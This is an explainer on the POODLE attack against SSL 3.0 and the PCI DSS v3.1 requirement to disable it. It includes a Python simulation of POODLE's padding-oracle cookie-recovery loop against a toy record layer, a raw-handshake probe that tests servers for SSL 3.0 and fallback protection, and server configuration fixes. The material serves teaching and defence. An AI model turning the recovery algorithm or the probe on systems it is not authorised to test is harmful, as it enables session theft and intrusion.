Why are POODLE and SSL v3 a problem?
As I’m sure you already know, the headline change in PCI DSS v3.1 is that “SSL” (and “early TLS”) no longer counts as “strong cryptography” in Requirement 4, which covers cardholder data in transit over open, public networks.
Whilst it is a small change on paper, it literally means hundreds of thousands of HTTPS web pages around the world need their underlying web servers reconfigured to refuse SSL 3.0 and negotiate only TLS.
Why change – what’s the risk?
POODLE (CVE-2014-3566) is a padding-oracle attack on the CBC cipher suites of SSL 3.0. SSL 3.0 checks only the padding-length byte of a decrypted record and never the padding bytes themselves, so an attacker who can tamper with ciphertext learns one byte of plaintext for roughly every 256 records the server rejects or accepts. In practice that means someone sitting between you and the server in an Internet cafe, able to modify traffic and to make your browser repeat a request (for instance with JavaScript injected into a plain HTTP page), can recover secrets such as your session cookie from an HTTPS session that negotiated SSL 3.0. Browsers of the day also silently fell back to SSL 3.0 when a TLS handshake was interfered with, so a server only has to still support SSL 3.0, not prefer it, for the attack to work.
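The mechanics just described, as an added worked example that is not code from the original post: a simulation of the POODLE byte-recovery loop against an SSL 3.0 style record layer, with a TLS-style padding check beside it for contrast. A four-round Feistel network built from SHA-256 stands in for the real block cipher, HMAC-SHA256 for the SSL 3.0 record MAC, and the `victim()` callable for the attacker-controlled JavaScript that makes the browser resend a request with chosen path and body lengths; all of those names and stand-ins are assumptions of this example, while the padding-check difference between SSL 3.0 and TLS is the real one.

```python
"""POODLE against SSL 3.0 CBC records, simulated end to end (added illustration).

A toy Feistel cipher stands in for AES/3DES and HMAC-SHA256 for the SSL 3.0 MAC;
the attack uses only CBC chaining plus the way SSL 3.0 checks padding.
"""
import hashlib
import hmac
import os

BLOCK = 16    # block size; a full padding block is BLOCK-1 pad bytes + 1 length byte
MAC_LEN = 32  # length of the stand-in record MAC

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key: bytes, rnd: int, half: bytes) -> bytes:
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def block_encrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:BLOCK // 2], blk[BLOCK // 2:]  # toy keyed permutation, not a real cipher
    for rnd in range(4):
        left, right = right, xor(left, _f(key, rnd, right))
    return left + right

def block_decrypt(key: bytes, blk: bytes) -> bytes:
    left, right = blk[:BLOCK // 2], blk[BLOCK // 2:]
    for rnd in reversed(range(4)):
        left, right = xor(right, _f(key, rnd, left)), left
    return left + right

def cbc_encrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        prev = block_encrypt(key, xor(data[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        out.append(xor(block_decrypt(key, data[i:i + BLOCK]), prev))
        prev = data[i:i + BLOCK]
    return b"".join(out)

class RecordLayer:
    """Server side of an SSL 3.0 (strict=False) or TLS 1.0-style (strict=True) record layer.
    SSL 3.0 checks only the padding_length byte; TLS also requires every padding byte
    to equal padding_length. That one difference is what POODLE exploits."""

    def __init__(self, strict: bool = False):
        self.enc_key, self.mac_key, self.strict = os.urandom(16), os.urandom(16), strict

    def _mac(self, payload: bytes) -> bytes:
        return hmac.new(self.mac_key, payload, hashlib.sha256).digest()

    def seal(self, payload: bytes) -> bytes:
        # GenericBlockCipher layout: payload || MAC || padding || padding_length
        pad_len = BLOCK - 1 - (len(payload) + MAC_LEN) % BLOCK
        padding = bytes([pad_len]) * pad_len if self.strict else os.urandom(pad_len)
        iv = os.urandom(BLOCK)  # explicit IV for simplicity; SSL 3.0 chains from the previous record
        return iv + cbc_encrypt(self.enc_key, iv, payload + self._mac(payload) + padding + bytes([pad_len]))

    def accepts(self, record: bytes) -> bool:
        """The oracle: True if the record decrypts to a valid MAC, False if an alert would be sent."""
        plain = cbc_decrypt(self.enc_key, record[:BLOCK], record[BLOCK:])
        pad_len = plain[-1]
        if pad_len + 1 > BLOCK or len(plain) < pad_len + 1 + MAC_LEN:
            return False
        if self.strict and any(b != pad_len for b in plain[-(pad_len + 1):-1]):
            return False
        body = plain[:-(pad_len + 1)]
        return hmac.compare_digest(body[-MAC_LEN:], self._mac(body[:-MAC_LEN]))

def poodle_recover(server: RecordLayer, victim, secret_len: int, max_tries: int = 1 << 16):
    """Recover the secret the victim embeds in every request, about 256 requests per byte.
    victim(prefix_len, suffix_len) models attacker JavaScript making the browser send a
    request with chosen path/body lengths around the cookie; the attacker sees only
    ciphertext. Returns None if the oracle never accepts (what a TLS-style check gives you)."""
    recovered = bytearray()
    for j in range(secret_len):
        prefix_len = (-(j + 1)) % BLOCK                              # secret[j] ends a plaintext block
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK  # force a full padding block
        t = (prefix_len + j + 1) // BLOCK                            # ciphertext index of that block (IV = 0)
        for _ in range(max_tries):
            ct = victim(prefix_len, suffix_len)
            blocks = [ct[k:k + BLOCK] for k in range(0, len(ct), BLOCK)]
            blocks[-1] = blocks[t]                                   # target block replaces the padding block
            if server.accepts(b"".join(blocks)):
                # Accepted only when the decrypted last byte is BLOCK-1, i.e.
                # P_t[-1] ^ C_{t-1}[-1] ^ C_{n-1}[-1] == BLOCK-1, which pins down P_t[-1].
                recovered.append((BLOCK - 1) ^ blocks[t - 1][-1] ^ blocks[-2][-1])
                break
        else:
            return None
    return bytes(recovered)

def demo(secret: bytes = b"session=7f3a", strict: bool = False, max_tries: int = 1 << 16):
    server = RecordLayer(strict)
    return poodle_recover(server, lambda p, s: server.seal(b"/" * p + secret + b"&" * s), len(secret), max_tries)

if __name__ == "__main__":
    print("SSL 3.0 padding check:", demo())
    print("TLS-style padding check:", demo(strict=True, max_tries=1000))
```

The attacker never decrypts anything directly: each accepted record reveals one byte because acceptance only happens when the copied block decrypts to a padding-length byte of 15, and every retry has fresh ciphertext because the browser re-encrypts the request. With the TLS-style check the oracle never fires, which is why the fix is to stop speaking SSL 3.0 rather than to patch anything.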
What can users do about it?
If you use HTTPS pages, or indeed HTTP pages, on insecure networks, then there is always a risk that someone can intercept your data. Use a browser that has SSL 3.0 disabled (current browsers do) and keep it updated. On untrusted networks we also recommend a VPN, so that people around you cannot sniff or tamper with your traffic.
What can website owners do about it?
Disable SSL v3.0 completely. Whether you like it or not. Enable TLS_FALLBACK_SCSV (RFC 7507) as well where your TLS stack supports it, so that clients which still fall back cannot be pushed down to an older version by an attacker. This is serious stuff, and if you carry on using v3.0, then people sitting on insecure networks using your website could potentially lose all the information they’re sending you to criminals.
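One way to check that the change has actually taken effect, as an added example that is not code from the original post: a small probe that sends a raw SSL 3.0 ClientHello and reads the first record the server returns, then repeats the exercise with a TLS 1.0 hello carrying TLS_FALLBACK_SCSV. It builds the handshake bytes itself rather than calling `openssl s_client -ssl3`, because current OpenSSL builds ship without SSL 3.0 support. The cipher-suite list, the `build_server_hello()` helper (used only to construct sample responses for offline checks) and the placeholder hostname in the usage line are assumptions of this example.

```python
"""Probe a server for SSL 3.0 support and for TLS_FALLBACK_SCSV (RFC 7507). Added example."""
import os
import socket
import struct

SSL3, TLS10 = 0x0300, 0x0301
TLS_FALLBACK_SCSV = 0x5600
# Widely supported RSA/DHE CBC suites plus RC4. A ServerHello choosing a CBC suite under
# SSL 3.0 is the POODLE configuration; any SSL 3.0 ServerHello at all is the PCI failing finding.
SUITES = [0x002F, 0x0035, 0x000A, 0x0033, 0x0039, 0x0005]
ALERTS = {40: "handshake_failure", 70: "protocol_version", 86: "inappropriate_fallback"}

def build_client_hello(version: int, suites) -> bytes:
    body = struct.pack(">H", version) + os.urandom(32) + b"\x00"           # version, random, no session id
    body += struct.pack(">H", 2 * len(suites)) + b"".join(struct.pack(">H", s) for s in suites)
    body += b"\x01\x00"                                                     # compression: null only
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body               # client_hello(1)
    return b"\x16" + struct.pack(">HH", version, len(handshake)) + handshake  # record type handshake(22)

def build_server_hello(version: int, suite: int) -> bytes:
    """Constructed ServerHello, used only to exercise the parser offline."""
    body = struct.pack(">H", version) + os.urandom(32) + b"\x00" + struct.pack(">H", suite) + b"\x00"
    handshake = b"\x02" + len(body).to_bytes(3, "big") + body
    return b"\x16" + struct.pack(">HH", version, len(handshake)) + handshake

def parse_record(data: bytes) -> dict:
    """Classify the first record a server returns: alert, server_hello, other or none."""
    if len(data) < 5:
        return {"kind": "none"}
    content_type = data[0]
    if content_type == 0x15 and len(data) >= 7:                              # alert(21): level, description
        return {"kind": "alert", "alert": data[6], "name": ALERTS.get(data[6], "code %d" % data[6])}
    if content_type == 0x16 and len(data) >= 44 and data[5] == 0x02:         # handshake(22), server_hello(2)
        version = int.from_bytes(data[9:11], "big")
        sid_len = data[43]                                                   # after type(1)+len(3)+version(2)+random(32)
        suite = int.from_bytes(data[44 + sid_len:46 + sid_len], "big") if len(data) >= 46 + sid_len else None
        return {"kind": "server_hello", "version": version, "suite": suite}
    return {"kind": "other", "content_type": content_type}

def sslv3_accepted(response: bytes) -> bool:
    r = parse_record(response)
    return r["kind"] == "server_hello" and r["version"] == SSL3

def fallback_scsv_honoured(response: bytes) -> bool:
    r = parse_record(response)
    return r["kind"] == "alert" and r["alert"] == 86

def exchange(host: str, port: int, hello: bytes, timeout: float = 5.0) -> bytes:
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(hello)
        try:
            return sock.recv(4096)
        except socket.timeout:
            return b""

def probe(host: str, port: int = 443) -> dict:
    ssl3 = exchange(host, port, build_client_hello(SSL3, SUITES))
    # A TLS 1.0 hello carrying the SCSV must draw inappropriate_fallback from a server that
    # implements RFC 7507 and supports something newer than TLS 1.0; if TLS 1.0 is the
    # server's best version the hello is not a fallback, so no alert is expected there.
    scsv = exchange(host, port, build_client_hello(TLS10, SUITES + [TLS_FALLBACK_SCSV]))
    return {"sslv3_accepted": sslv3_accepted(ssl3), "sslv3_response": parse_record(ssl3),
            "fallback_scsv_honoured": fallback_scsv_honoured(scsv)}

if __name__ == "__main__":
    print(probe("payments.example.com"))  # placeholder host: point it at your own server
```

Run it only against hosts you own. A `protocol_version` or `handshake_failure` alert (or a closed connection) in `sslv3_response` is what you want to see; a ServerHello with version 0x0300 means the change has not landed. The server-side fix itself is configuration, for example `SSLProtocol all -SSLv3 -SSLv2` in Apache httpd or `ssl_protocols TLSv1 TLSv1.1 TLSv1.2;` in nginx, followed by a restart and a re-run of the probe.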
What’s actually happening?
Website owners aren’t disabling it quickly enough. Either they’re not aware of the problem, or they are aware and do not want to stop users of older browsers, chiefly Internet Explorer 6, which ships with TLS 1.0 switched off and so can only speak SSL 3.0, from doing business with them.
What will QSAs do if they discover POODLE on your system?
You will fail your assessment: POODLE is a critical vulnerability that is well over 30 days old, and PCI DSS expects critical security patches to be applied within a month of release (Requirement 6.2); your quarterly external vulnerability scans (Requirement 11.2) will also flag SSL 3.0 as a failing finding. POODLE on a payment page has pretty obvious consequences.